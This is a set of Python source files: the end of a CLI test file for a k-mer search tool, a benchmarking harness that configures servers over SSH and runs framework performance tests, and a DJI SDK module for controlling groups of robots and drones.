server_thread.start()
result = runner.invoke(
main,
[
'search', 'file', f'-p {PORT}', '--search-mode=coarse', '-r 0', '-i 0.1',
outfile, KMER_TABLE
])
self.assertEqual(result.exit_code, 0)
runner.invoke(main, ['shutdown-search-server', f'-p {PORT}'])
finally:
if server_thread.is_alive():
server_thread.terminate()
'''
def test_build_db_cli(self):
runner = CliRunner()
with runner.isolated_filesystem():
db_path = 'temp.db_cli_test.sqlite'
result = runner.invoke(
main, [
'build', 'grid', '-r 0.5', '-d 4', '-n 50',
'-s 50', f'-o={db_path}',
KMER_ROTATION, KMER_TABLE
])
self.assertEqual(result.exit_code, 0)
def test_db_stats(self):
runner = CliRunner()
result = runner.invoke(main, ['stats', 'cover-stats', GRID_COVER])
self.assertEqual(result.exit_code, 0)
self.assertIn('kmers\t100', result.output)
|
benchmarker.py
|
from setup.linux.installer import Installer
from benchmark import framework_test
import os
import json
import subprocess
import time
import textwrap
import pprint
import csv
import sys
import logging
import socket
import glob
from multiprocessing import Process
from datetime import datetime
class Benchmarker:
##########################################################################################
# Public methods
##########################################################################################
############################################################
# Prints all the available tests
############################################################
def run_list_tests(self):
all_tests = self.__gather_tests
for test in all_tests:
print test.name
self.__finish()
############################################################
# End run_list_tests
############################################################
############################################################
# Prints the metadata for all the available tests
############################################################
def run_list_test_metadata(self):
all_tests = self.__gather_tests
all_tests_json = json.dumps(map(lambda test: {
"name": test.name,
"approach": test.approach,
"classification": test.classification,
"database": test.database,
"framework": test.framework,
"language": test.language,
"orm": test.orm,
"platform": test.platform,
"webserver": test.webserver,
"os": test.os,
"database_os": test.database_os,
"display_name": test.display_name,
"notes": test.notes,
"versus": test.versus
}, all_tests))
with open(os.path.join(self.full_results_directory(), "test_metadata.json"), "w") as f:
f.write(all_tests_json)
self.__finish()
############################################################
# End run_list_test_metadata
############################################################
############################################################
# parse_timestamp
# Re-parses the raw data for a given timestamp
############################################################
def parse_timestamp(self):
all_tests = self.__gather_tests
for test in all_tests:
test.parse_all()
self.__parse_results(all_tests)
self.__finish()
############################################################
# End parse_timestamp
############################################################
############################################################
# Run the tests:
# This process involves setting up the client/server machines
# with any necessary change. Then going through each test,
# running their setup script, verifying the URLs, and
# running benchmarks against them.
############################################################
def run(self):
##########################
# Get a list of all known
# tests that we can run.
##########################
all_tests = self.__gather_tests
##########################
# Setup client/server
##########################
print textwrap.dedent("""
=====================================================
Preparing Server, Database, and Client ...
=====================================================
""")
self.__setup_server()
self.__setup_database()
self.__setup_client()
## Check if wrk (and wrk-pipeline) is installed and executable, if not, raise an exception
#if not (os.access("/usr/local/bin/wrk", os.X_OK) and os.access("/usr/local/bin/wrk-pipeline", os.X_OK)):
# raise Exception("wrk and/or wrk-pipeline are not properly installed. Not running tests.")
##########################
# Run tests
##########################
print textwrap.dedent("""
=====================================================
Running Tests ...
=====================================================
""")
self.__run_tests(all_tests)
##########################
# Parse results
##########################
if self.mode == "benchmark":
print textwrap.dedent("""
=====================================================
Parsing Results ...
=====================================================
""")
self.__parse_results(all_tests)
self.__finish()
############################################################
# End run
############################################################
############################################################
# database_sftp_string(batch_file)
# generates a fully qualified URL for sftp to database
############################################################
def database_sftp_string(self, batch_file):
sftp_string = "sftp -oStrictHostKeyChecking=no "
if batch_file != None: sftp_string += " -b " + batch_file + " "
if self.database_identity_file != None:
sftp_string += " -i " + self.database_identity_file + " "
return sftp_string + self.database_user + "@" + self.database_host
############################################################
# End database_sftp_string
############################################################
############################################################
# client_sftp_string(batch_file)
# generates a fully qualified URL for sftp to client
############################################################
def client_sftp_string(self, batch_file):
sftp_string = "sftp -oStrictHostKeyChecking=no "
if batch_file != None: sftp_string += " -b " + batch_file + " "
if self.client_identity_file != None:
sftp_string += " -i " + self.client_identity_file + " "
return sftp_string + self.client_user + "@" + self.client_host
############################################################
# End client_sftp_string
############################################################
############################################################
# generate_url(url, port)
# generates a fully qualified URL for accessing a test url
############################################################
def generate_url(self, url, port):
return self.server_host + ":" + str(port) + url
############################################################
# End generate_url
############################################################
############################################################
# get_output_file(test_name, test_type)
# returns the output file name for this test_name and
# test_type timestamp/test_type/test_name/raw
############################################################
def get_output_file(self, test_name, test_type):
return os.path.join(self.result_directory, self.timestamp, test_type, test_name, "raw")
############################################################
# End get_output_file
############################################################
############################################################
# output_file(test_name, test_type)
# returns the output file for this test_name and test_type
# timestamp/test_type/test_name/raw
############################################################
def output_file(self, test_name, test_type):
path = self.get_output_file(test_name, test_type)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
############################################################
# End output_file
############################################################
############################################################
# get_warning_file(test_name, test_type)
# returns the output file name for this test_name and
# test_type timestamp/test_type/test_name/raw
############################################################
def get_warning_file(self, test_name, test_type):
return os.path.join(self.result_directory, self.timestamp, test_type, test_name, "warn")
############################################################
# End get_warning_file
############################################################
############################################################
# warning_file(test_name, test_type)
# returns the warning file for this test_name and test_type
# timestamp/test_type/test_name/raw
############################################################
def warning_file(self, test_name, test_type):
path = self.get_warning_file(test_name, test_type)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
############################################################
# End warning_file
############################################################
############################################################
# full_results_directory
############################################################
def full_results_directory(self):
path = os.path.join(self.result_directory, self.timestamp)
try:
os.makedirs(path)
except OSError:
pass
return path
############################################################
# End full_results_directory
############################################################
############################################################
# Latest intermediate results dirctory
############################################################
def latest_results_directory(self):
path = os.path.join(self.result_directory,"latest")
try:
os.makedirs(path)
except OSError:
pass
return path
############################################################
# report_results
############################################################
def report_results(self, framework, test, results):
if test not in self.results['rawData'].keys():
self.results['rawData'][test] = dict()
# If results has a size from the parse, then it succeeded.
if results:
self.results['rawData'][test][framework.name] = results
# This may already be set for single-tests
if framework.name not in self.results['succeeded'][test]:
self.results['succeeded'][test].append(framework.name)
# Add this type
if (os.path.exists(self.get_warning_file(framework.name, test)) and
framework.name not in self.results['warning'][test]):
self.results['warning'][test].append(framework.name)
else:
# This may already be set for single-tests
if framework.name not in self.results['failed'][test]:
self.results['failed'][test].append(framework.name)
############################################################
# End report_results
############################################################
##########################################################################################
# Private methods
##########################################################################################
############################################################
# Gathers all the tests
############################################################
@property
def __gather_tests(self):
tests = []
# Assume we are running from FrameworkBenchmarks
config_files = glob.glob('*/benchmark_config')
for config_file_name in config_files:
# Look for the benchmark_config file, this will set up our tests.
# Its format looks like this:
#
# {
# "framework": "nodejs",
# "tests": [{
# "default": {
# "setup_file": "setup",
# "json_url": "/json"
# },
# "mysql": {
# "setup_file": "setup",
# "db_url": "/mysql",
# "query_url": "/mysql?queries="
# },
# ...
# }]
# }
config = None
with open(config_file_name, 'r') as config_file:
# Load json file into config object
try:
config = json.load(config_file)
except:
print("Error loading '%s'." % config_file_name)
raise
if config is None:
continue
test = framework_test.parse_config(config, os.path.dirname(config_file_name), self)
# If the user specified which tests to run, then
# we can skip over tests that are not in that list
if self.test == None:
tests = tests + test
else:
for atest in test:
if atest.name in self.test:
tests.append(atest)
tests.sort(key=lambda x: x.name)
return tests
############################################################
# End __gather_tests
############################################################
############################################################
# Gathers all the frameworks
############################################################
def __gather_frameworks(self):
frameworks = []
# Loop through each directory (we assume we're being run from the benchmarking root)
for dirname, dirnames, filenames in os.walk('.'):
# Look for the benchmark_config file, this will contain our framework name
# It's format looks like this:
#
# {
# "framework": "nodejs",
# "tests": [{
# "default": {
# "setup_file": "setup",
# "json_url": "/json"
# },
# "mysql": {
# "setup_file": "setup",
# "db_url": "/mysql",
# "query_url": "/mysql?queries="
# },
# ...
# }]
# }
if 'benchmark_config' in filenames:
config = None
with open(os.path.join(dirname, 'benchmark_config'), 'r') as config_file:
# Load json file into config object
config = json.load(config_file)
if config == None:
continue
frameworks.append(str(config['framework']))
return frameworks
############################################################
# End __gather_frameworks
############################################################
############################################################
# Makes any necessary changes to the server that should be
# made before running the tests. This involves setting kernal
# settings to allow for more connections, or more file
# descriptiors
#
# http://redmine.lighttpd.net/projects/weighttp/wiki#Troubleshooting
############################################################
def __setup_server(self):
try:
if os.name == 'nt':
return True
# This doesn't seem to ever run correctly, which causes the rest to not be run.
#subprocess.check_call(["sudo","bash","-c","cd /sys/devices/system/cpu; ls -d cpu*|while read x; do echo performance > $x/cpufreq/scaling_governor; done"])
subprocess.check_call("sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535".rsplit(" "))
subprocess.check_call("sudo sysctl -w net.core.somaxconn=65535".rsplit(" "))
subprocess.check_call("sudo -s ulimit -n 65535".rsplit(" "))
subprocess.check_call("sudo sysctl net.ipv4.tcp_tw_reuse=1".rsplit(" "))
subprocess.check_call("sudo sysctl net.ipv4.tcp_tw_recycle=1".rsplit(" "))
subprocess.check_call("sudo sysctl -w kernel.shmmax=134217728".rsplit(" "))
subprocess.check_call("sudo sysctl -w kernel.shmall=2097152".rsplit(" "))
except subprocess.CalledProcessError:
return False
############################################################
# End __setup_server
############################################################
############################################################
# Makes any necessary changes to the database machine that
# should be made before running the tests. Is very similar
# to the server setup, but may also include database specific
# changes.
############################################################
def __setup_database(self):
p = subprocess.Popen(self.database_ssh_string, stdin=subprocess.PIPE, shell=True)
p.communicate("""
sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535
sudo sysctl -w net.core.somaxconn=65535
sudo -s ulimit -n 65535
sudo sysctl net.ipv4.tcp_tw_reuse=1
sudo sysctl net.ipv4.tcp_tw_recycle=1
sudo sysctl -w kernel.shmmax=2147483648
sudo sysctl -w kernel.shmall=2097152
""")
############################################################
# End __setup_database
############################################################
############################################################
# Makes any necessary changes to the client machine that
# should be made before running the tests. Is very similar
# to the server setup, but may also include client specific
# changes.
############################################################
def __setup_client(self):
p = subprocess.Popen(self.client_ssh_string, stdin=subprocess.PIPE, shell=True)
p.communicate("""
sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535
sudo sysctl -w net.core.somaxconn=65535
sudo -s ulimit -n 65535
sudo sysctl net.ipv4.tcp_tw_reuse=1
sudo sysctl net.ipv4.tcp_tw_recycle=1
sudo sysctl -w kernel.shmmax=2147483648
sudo sysctl -w kernel.shmall=2097152
""")
############################################################
# End __setup_client
############################################################
############################################################
# __run_tests
#
# 2013-10-02 ASB Calls each test passed in tests to
# __run_test in a separate process. Each
# test is given a set amount of time and if
# kills the child process (and subsequently
# all of its child processes). Uses
# multiprocessing module.
############################################################
def __run_tests(self, tests):
logging.debug("Start __run_tests.")
logging.debug("__name__ = %s",__name__)
if self.os.lower() == 'windows':
logging.debug("Executing __run_tests on Windows")
for test in tests:
self.__run_test(test)
else:
logging.debug("Executing __run_tests on Linux")
# These features do not work on Windows
for test in tests:
if __name__ == 'benchmark.benchmarker':
print textwrap.dedent("""
-----------------------------------------------------
Running Test: {name} ...
-----------------------------------------------------
""".format(name=test.name))
test_process = Process(target=self.__run_test, args=(test,))
test_process.start()
test_process.join(self.run_test_timeout_seconds)
if(test_process.is_alive()):
logging.debug("Child process for {name} is still alive. Terminating.".format(name=test.name))
self.__write_intermediate_results(test.name,"__run_test timeout (="+ str(self.run_test_timeout_seconds) + " seconds)")
test_process.terminate()
logging.debug("End __run_tests.")
############################################################
# End __run_tests
############################################################
############################################################
# __run_test
# 2013-10-02 ASB Previously __run_tests. This code now only
# processes a single test.
#
# Ensures that the system has all necessary software to run
# the tests. This does not include that software for the individual
# test, but covers software such as curl and weighttp that
# are needed.
############################################################
def __run_test(self, test):
try:
os.makedirs(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name)))
except:
pass
with open(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name), 'out.txt'), 'w') as out, \
open(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name), 'err.txt'), 'w') as err:
if hasattr(test, 'skip'):
if test.skip.lower() == "true":
out.write("Test {name} benchmark_config specifies to skip this test. Skipping.\n".format(name=test.name))
return
if test.os.lower() != self.os.lower() or test.database_os.lower() != self.database_os.lower():
# the operating system requirements of this test for the
# application server or the database server don't match
# our current environment
out.write("OS or Database OS specified in benchmark_config does not match the current environment. Skipping.\n")
return
# If the test is in the excludes list, we skip it
if self.exclude != None and test.name in self.exclude:
out.write("Test {name} has been added to the excludes list. Skipping.\n".format(name=test.name))
return
# If the test does not contain an implementation of the current test-type, skip it
if self.type != 'all' and not test.contains_type(self.type):
out.write("Test type {type} does not contain an implementation of the current test-type. Skipping.\n".format(type=self.type))
return
out.write("test.os.lower() = {os} test.database_os.lower() = {dbos}\n".format(os=test.os.lower(),dbos=test.database_os.lower()))
out.write("self.results['frameworks'] != None: {val}\n".format(val=str(self.results['frameworks'] != None)))
out.write("test.name: {name}\n".format(name=str(test.name)))
out.write("self.results['completed']: {completed}\n".format(completed=str(self.results['completed'])))
if self.results['frameworks'] != None and test.name in self.results['completed']:
out.write('Framework {name} found in latest saved data. Skipping.\n'.format(name=str(test.name)))
return
out.flush()
out.write( textwrap.dedent("""
=====================================================
Beginning {name}
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
##########################
# Start this test
##########################
out.write( textwrap.dedent("""
-----------------------------------------------------
Starting {name}
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
try:
if test.requires_database():
p = subprocess.Popen(self.database_ssh_string, stdin=subprocess.PIPE, stdout=out, stderr=err, shell=True)
p.communicate("""
sudo restart mysql
sudo restart mongodb
sudo /etc/init.d/postgresql restart
""")
time.sleep(10)
if self.__is_port_bound(test.port):
self.__write_intermediate_results(test.name, "port " + str(test.port) + " is not available before start")
err.write( textwrap.dedent("""
---------------------------------------------------------
Error: Port {port} is not available before start {name}
---------------------------------------------------------
""".format(name=test.name, port=str(test.port))) )
err.flush()
return
result = test.start(out, err)
if result != 0:
test.stop(out, err)
time.sleep(5)
err.write( "ERROR: Problem starting {name}\n".format(name=test.name) )
err.write( textwrap.dedent("""
-----------------------------------------------------
Stopped {name}
-----------------------------------------------------
""".format(name=test.name)) )
err.flush()
self.__write_intermediate_results(test.name,"<setup.py>#start() returned non-zero")
return
time.sleep(self.sleep)
##########################
# Verify URLs
##########################
test.verify_urls(out, err)
out.flush()
err.flush()
##########################
# Benchmark this test
##########################
if self.mode == "benchmark":
out.write( textwrap.dedent("""
-----------------------------------------------------
Benchmarking {name} ...
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
test.benchmark(out, err)
out.flush()
err.flush()
##########################
# Stop this test
##########################
out.write( textwrap.dedent("""
-----------------------------------------------------
Stopping {name}
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
test.stop(out, err)
out.flush()
err.flush()
time.sleep(5)
if self.__is_port_bound(test.port):
self.__write_intermediate_results(test.name, "port " + str(test.port) + " was not released by stop")
err.write( textwrap.dedent("""
-----------------------------------------------------
Error: Port {port} was not released by stop {name}
-----------------------------------------------------
""".format(name=test.name, port=str(test.port))) )
err.flush()
return
out.write( textwrap.dedent("""
-----------------------------------------------------
Stopped {name}
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
time.sleep(5)
##########################################################
# Save results thus far into toolset/benchmark/latest.json
##########################################################
out.write( textwrap.dedent("""
----------------------------------------------------
Saving results through {name}
----------------------------------------------------
""".format(name=test.name)) )
out.flush()
self.__write_intermediate_results(test.name,time.strftime("%Y%m%d%H%M%S", time.localtime()))
except (OSError, IOError, subprocess.CalledProcessError) as e:
self.__write_intermediate_results(test.name,"<setup.py> raised an exception")
err.write( textwrap.dedent("""
-----------------------------------------------------
Subprocess Error {name}
-----------------------------------------------------
{err}
{trace}
""".format(name=test.name, err=e, trace=sys.exc_info()[:2])) )
err.flush()
try:
test.stop(out, err)
except (subprocess.CalledProcessError) as e:
self.__write_intermediate_results(test.name,"<setup.py>#stop() raised an error")
err.write( textwrap.dedent("""
-----------------------------------------------------
Subprocess Error: Test .stop() raised exception {name}
-----------------------------------------------------
{err}
{trace}
""".format(name=test.name, err=e, trace=sys.exc_info()[:2])) )
err.flush()
except (KeyboardInterrupt, SystemExit) as e:
test.stop(out)
out.write( """
-----------------------------------------------------
Cleaning up....
-----------------------------------------------------
""")
out.flush()
self.__finish()
sys.exit()
out.close()
err.close()
############################################################
# End __run_tests
############################################################
############################################################
# __is_port_bound
# Check if the requested port is available. If it
# isn't available, then a previous test probably didn't
# shutdown properly.
############################################################
def __is_port_bound(self, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Try to bind to all IP addresses, this port
s.bind(("", port))
# If we get here, we were able to bind successfully,
# which means the port is free.
except:
# If we get an exception, it might be because the port is still bound
# which would be bad, or maybe it is a privileged port (<1024) and we
# are not running as root, or maybe the server is gone, but sockets are
# still in TIME_WAIT (SO_REUSEADDR). To determine which scenario, try to
# connect.
try:
s.connect(("127.0.0.1", port))
# If we get here, we were able to connect to something, which means
# that the port is still bound.
return True
except:
# An exception means that we couldn't connect, so a server probably
# isn't still running on the port.
pass
finally:
s.close()
return False
############################################################
# End __is_port_bound
############################################################
############################################################
# __parse_results
# Ensures that the system has all necessary software to run
# the tests. This does not include that software for the individual
# test, but covers software such as curl and weighttp that
# are needed.
############################################################
def __parse_results(self, tests):
# Run the method to get the commmit count of each framework.
self.__count_commits()
# Call the method which counts the sloc for each framework
self.__count_sloc()
# Time to create parsed files
# Aggregate JSON file
with open(os.path.join(self.full_results_directory(), "results.json"), "w") as f:
f.write(json.dumps(self.results))
############################################################
# End __parse_results
############################################################
#############################################################
# __count_sloc
# This is assumed to be run from the benchmark root directory
#############################################################
def __count_sloc(self):
all_frameworks = self.__gather_frameworks()
jsonResult = {}
for framework in all_frameworks:
try:
command = "cloc --list-file=" + framework['directory'] + "/source_code --yaml"
lineCount = subprocess.check_output(command, shell=True)
# Find the last instance of the word 'code' in the yaml output. This should
# be the line count for the sum of all listed files or just the line count
# for the last file in the case where there's only one file listed.
lineCount = lineCount[lineCount.rfind('code'):len(lineCount)]
lineCount = lineCount.strip('code: ')
lineCount = lineCount[0:lineCount.rfind('comment')]
jsonResult[framework['name']] = int(lineCount)
except:
continue
self.results['rawData']['slocCounts'] = jsonResult
############################################################
# End __count_sloc
############################################################
############################################################
# __count_commits
############################################################
def __count_commits(self):
all_frameworks = self.__gather_frameworks()
jsonResult = {}
for framework in all_frameworks:
try:
command = "git rev-list HEAD -- " + framework + " | sort -u | wc -l"
commitCount = subprocess.check_output(command, shell=True)
jsonResult[framework] = int(commitCount)
except:
continue
self.results['rawData']['commitCounts'] = jsonResult
self.commits = jsonResult
############################################################
# End __count_commits
############################################################
############################################################
# __write_intermediate_results
############################################################
def __write_intermediate_results(self,test_name,status_message):
try:
self.results["completed"][test_name] = status_message
with open(os.path.join(self.latest_results_directory, 'results.json'), 'w') as f:
f.write(json.dumps(self.results))
except (IOError):
logging.error("Error writing results.json")
############################################################
# End __write_intermediate_results
############################################################
############################################################
# __finish
############################################################
def __finish(self):
print "Time to complete: " + str(int(time.time() - self.start_time)) + " seconds"
print "Results are saved in " + os.path.join(self.result_directory, self.timestamp)
############################################################
# End __finish
############################################################
##########################################################################################
# Constructor
##########################################################################################
############################################################
# Initialize the benchmarker. The args are the arguments
# parsed via argparser.
############################################################
def __init__(self, args):
self.__dict__.update(args)
self.start_time = time.time()
self.run_test_timeout_seconds = 3600
# setup logging
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
# setup some additional variables
if self.database_user == None: self.database_user = self.client_user
if self.database_host == None: self.database_host = self.client_host
if self.database_identity_file == None: self.database_identity_file = self.client_identity_file
# setup results and latest_results directories
self.result_directory = os.path.join("results", self.name)
self.latest_results_directory = self.latest_results_directory()
if self.parse != None:
self.timestamp = self.parse
else:
self.timestamp = time.strftime("%Y%m%d%H%M%S", time.localtime())
# Setup the concurrency levels array. This array goes from
# starting_concurrency to max concurrency, doubling each time
self.concurrency_levels = []
concurrency = self.starting_concurrency
while concurrency <= self.max_concurrency:
self.concurrency_levels.append(concurrency)
concurrency = concurrency * 2
# Setup query interval array
# starts at 1, and goes up to max_queries, using the query_interval
self.query_intervals = []
queries = 1
while queries <= self.max_queries:
self.query_intervals.append(queries)
if queries == 1:
queries = 0
queries = queries + self.query_interval
# Load the latest data
#self.latest = None
#try:
# with open('toolset/benchmark/latest.json', 'r') as f:
# # Load json file into config object
# self.latest = json.load(f)
# logging.info("toolset/benchmark/latest.json loaded to self.latest")
# logging.debug("contents of latest.json: " + str(json.dumps(self.latest)))
#except IOError:
# logging.warn("IOError on attempting to read toolset/benchmark/latest.json")
#
#self.results = None
#try:
# if self.latest != None and self.name in self.latest.keys():
# with open(os.path.join(self.result_directory, str(self.latest[self.name]), 'results.json'), 'r') as f:
# # Load json file into config object
# self.results = json.load(f)
#except IOError:
# pass
self.results = None
try:
with open(os.path.join(self.latest_results_directory, 'results.json'), 'r') as f:
#Load json file into results object
self.results = json.load(f)
except IOError:
logging.warn("results.json for test %s not found.",self.name)
if self.results == None:
self.results = dict()
self.results['name'] = self.name
self.results['concurrencyLevels'] = self.concurrency_levels
self.results['queryIntervals'] = self.query_intervals
self.results['frameworks'] = [t.name for t in self.__gather_tests]
self.results['duration'] = self.duration
self.results['rawData'] = dict()
self.results['rawData']['json'] = dict()
self.results['rawData']['db'] = dict()
self.results['rawData']['query'] = dict()
self.results['rawData']['fortune'] = dict()
self.results['rawData']['update'] = dict()
self.results['rawData']['plaintext'] = dict()
self.results['completed'] = dict()
self.results['succeeded'] = dict()
self.results['succeeded']['json'] = []
self.results['succeeded']['db'] = []
self.results['succeeded']['query'] = []
self.results['succeeded']['fortune'] = []
self.results['succeeded']['update'] = []
self.results['succeeded']['plaintext'] = []
self.results['failed'] = dict()
self.results['failed']['json'] = []
self.results['failed']['db'] = []
self.results['failed']['query'] = []
self.results['failed']['fortune'] = []
self.results['failed']['update'] = []
self.results['failed']['plaintext'] = []
self.results['warning'] = dict()
self.results['warning']['json'] = []
self.results['warning']['db'] = []
self.results['warning']['query'] = []
self.results['warning']['fortune'] = []
self.results['warning']['update'] = []
self.results['warning']['plaintext'] = []
else:
#for x in self.__gather_tests():
# if x.name not in self.results['frameworks']:
# self.results['frameworks'] = self.results['frameworks'] + [x.name]
# Always overwrite framework list
self.results['frameworks'] = [t.name for t in self.__gather_tests]
# Setup the ssh command string
self.database_ssh_string = "ssh -T -o StrictHostKeyChecking=no " + self.database_user + "@" + self.database_host
self.client_ssh_string = "ssh -T -o StrictHostKeyChecking=no " + self.client_user + "@" + self.client_host
if self.database_identity_file != None:
self.database_ssh_string = self.database_ssh_string + " -i " + self.database_identity_file
if self.client_identity_file != None:
self.client_ssh_string = self.client_ssh_string + " -i " + self.client_identity_file
if self.install_software:
install = Installer(self)
install.install_software()
############################################################
# End __init__
############################################################
|
multi_group.py
|
# -*-coding:utf-8-*-
# Copyright (c) 2020 DJI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import threading
from . import multi_module
from . import logger
from . import tool
class RobotGroupBase(object):
"""robot group object"""
def __init__(self, robots_group_list, all_robots_dict):
# Input checking should be done in MultiRobot.build_group()
self._robots_id_in_group_list = robots_group_list # robot id list
self._all_robots_dict = all_robots_dict # all robots in MultiRobot
self._group_modules_dict = {} # the modules of RobotGroup. {name:module-obj, ... }
def __del__(self):
for module_name, module_obj in self._group_modules_dict.items():
del module_obj
logger.info(
"RobotGroupBase: __del__ delete module: {}".format(module_name))
def initialize(self):
self._scan_group_module()
def get_robot(self, robot_id):
"""Get robot by robot-id
:param robot_id:
:return:
"""
return self._all_robots_dict[robot_id]
@property
def robots_num(self):
return len(self._robots_id_in_group_list)
@property
def all_robots_dict(self):
return self._all_robots_dict
def _scan_group_module(self):
pass
def get_group_module(self, name):
"""Get group module by name
:param name:
:return:
"""
get_result = True
for robot_id in self._robots_id_in_group_list:
if self._all_robots_dict[robot_id].get_module(name) is None:
get_result = False
logger.error(
"[MulitRobot] robot id {0}: the {1} module is not online".format(
robot_id, name))
if get_result:
logger.debug(
"RobotGroup: get_group_module, group modules {0}".format(
self._group_modules_dict))
return self._group_modules_dict[name]
else:
return None
@property
def robots_id_list(self):
return self._robots_id_in_group_list
def append(self, robots_id_list):
""" Add robots to the group
:param robots_id_list:
:return:
"""
check_result, robot_id = tool.check_robots_id(
robots_id_list, self._all_robots_dict)
if not check_result:
raise Exception('Robot id %d is not exist' % robot_id)
for robot_id in robots_id_list:
if robot_id in self._robots_id_in_group_list:
logger.warning(
"RobotGroupBase: robot id {0} is in group {1}".format(
robot_id, self._robots_id_in_group_list))
else:
self._robots_id_in_group_list.append(robot_id)
logger.info(
"RobotGroupBase: robot id {0} has been added into group {1}".format(
robot_id, self._robots_id_in_group_list))
def remove(self, robots_id_list):
"""remove the robots from robot group
:param robots_list: robots need to be remove
:return: True: successful, False: some robot are not in this group
"""
final_result = True
for robot_id in robots_id_list:
if robot_id not in self._robots_id_in_group_list:
logger.warning(
"RobotGroupBase: robot id {0} is not in group {1}".format(
robot_id, self._robots_id_in_group_list))
final_result = False
else:
self._robots_id_in_group_list.remove(robot_id)
logger.info(
"RobotGroupBase: robot id {0} has been removed from group {1}".format(
robot_id, self._robots_id_in_group_list))
return final_result
def execute_action(self, action_name, *args, **kw):
"""Executive function for non-instantaneous action
that have 'wait_for_all_completion()'.
:param action_name: which action need exec
:param args: the action params
:param args: the action key params
:return:
"""
action_dict = {}
for robot_id in self._robots_id_in_group_list:
robot_obj = self.all_robots_dict[robot_id]
action_dict[robot_id] = getattr(robot_obj, action_name)(*args, **kw)
logger.info("Multi Module robot id {0}: begin to execute the action".format(robot_id))
multi_action = multi_module.MultiAction(action_dict)
return multi_action
def execute_command(self, command_name, *input_args, **input_kw):
"""Executive function for instantaneous action
that do not have 'wait_for_all_completion()'.
:param command_name: which command need send
:param args: the command params
:return:
"""
start_time = time.time()
thread_dict = {} # {robot_id: thread}
result_dict = {} # {robot_id: result, ... }
for robot_id in self._robots_id_in_group_list:
robot_obj = self.all_robots_dict[robot_id]
exec_cmd_thread = tool.TelloThread(target=getattr(robot_obj, command_name), *input_args, **input_kw)
thread_dict[robot_id] = exec_cmd_thread
second_time = time.time()
# start threads
for robot_id, thread_obj in thread_dict.items():
thread_obj.start()
logger.debug("send command start spend time {0}".format(time.time() - second_time))
for robot_id, exec_cmd_thread in thread_dict.items():
exec_cmd_thread.join()
result_dict[robot_id] = exec_cmd_thread.get_result()
spend_time = time.time() - start_time
logger.debug("send command spend time {0}".format(spend_time))
logger.debug("RobotGroupBase: execute_command, result {0}".format(result_dict))
return result_dict
def get_sn(self):
""" 获取组内机器的sn编号
:param args:
:return: dict: {robot_id: SN, ... }储存机器sn编号的字典,字典的键为机器的编号,值为对应的机器的sn号码
"""
return self.execute_command('get_sn')
class RMGroup(RobotGroupBase):
def __init__(self, robots_group_list, all_robots_dict):
super().__init__(robots_group_list, all_robots_dict)
def _scan_group_module(self):
_chassis = multi_module.MultiRmModule(self, 'Chassis')
_gimbal = multi_module.MultiRmModule(self, 'Gimbal')
_blaster = multi_module.MultiRmModule(self, 'Blaster')
_led = multi_module.MultiRmModule(self, 'Led')
_robotic_arm = multi_module.MultiRmModule(self, 'RoboticArm')
_gripper = multi_module.MultiRmModule(self, 'Gripper')
self._group_modules_dict[_chassis.name] = _chassis
self._group_modules_dict[_gimbal.name] = _gimbal
self._group_modules_dict[_blaster.name] = _blaster
self._group_modules_dict[_led.name] = _led
self._group_modules_dict[_robotic_arm.name] = _robotic_arm
self._group_modules_dict[_gripper.name] = _gripper
def set_group_robots_mode(self, mode="free"):
all_result = True
for robot_id in self._robots_id_in_group_list:
result = self._all_robots_dict[robot_id].set_robot_mode(mode)
all_result = result and all_result
if not result:
logger.error(
"RobotGroup: set group_robots_mode {0}, robot id {1} set mode error!".format(mode, robot_id))
else:
logger.info(
"RobotGroup: set group_robots_mode {0}, robot id {1} set mode successfully!".format(mode, robot_id))
if all_result:
logger.info(
"RobotGroup: set_group_robots_mode {1}, group {0} set successfully".format(
self._robots_id_in_group_list, mode))
else:
logger.info(
"RobotGroup: set_group_robots_mode {1}, group {0} set error".format(
self._robots_id_in_group_list, mode))
return all_result
def play_sound(self, sound_id, times=1):
"""
robots in group play sound
:param sound_id:
:return:
"""
final_result = False
for robot_id in self._robots_id_in_group_list:
result = self._all_robots_dict[robot_id].play_sound(
sound_id, times)
if not result:
logger.warning("RobotGroup: Robot id {0} play_sound failed".format(robot_id))
final_result = final_result and result
return final_result
@property
def chassis(self):
""" Get chassis obj """
return self.get_group_module("Chassis")
@property
def gimbal(self):
""" Get gimbal obj """
return self.get_group_module("Gimbal")
@property
def blaster(self):
""" Get blaster obj """
return self.get_group_module("Blaster")
@property
def led(self):
""" Get led obj """
return self.get_group_module("Led")
@property
def robotic_arm(self):
""" Get arm obj """
return self.get_group_module("RoboticArm")
@property
def sensor(self):
""" Get sensor obj"""
return self.get_group_module("DistanceSensor")
@property
def gripper(self):
""" Get gripper obj """
return self.get_group_module("Gripper")
class SingleDroneInGroup(multi_module.TelloAction):
def __init__(self, client, _robot_id, _robot_sn, _robot_host):
self._client = client
self._robot_id = _robot_id
self._robot_sn = _robot_sn
self._robot_host = _robot_host
self.event = threading.Event()
self.robot_group_host_list = []
self.event.set()
self._dispatcher = multi_module.TelloDispatcher(self._client, self.event, {self._robot_host: self._robot_id})
self._dispatcher.action_host_list = [self._robot_host]
def close(self):
pass
def send_command(self, command):
self.event.wait(10)
if self.event.isSet():
logger.info("execute command:{}".format(command))
proto = tool.TelloProtocol(command, self._robot_host)
self._client.send(proto)
self.event.clear()
else:
self.event.set()
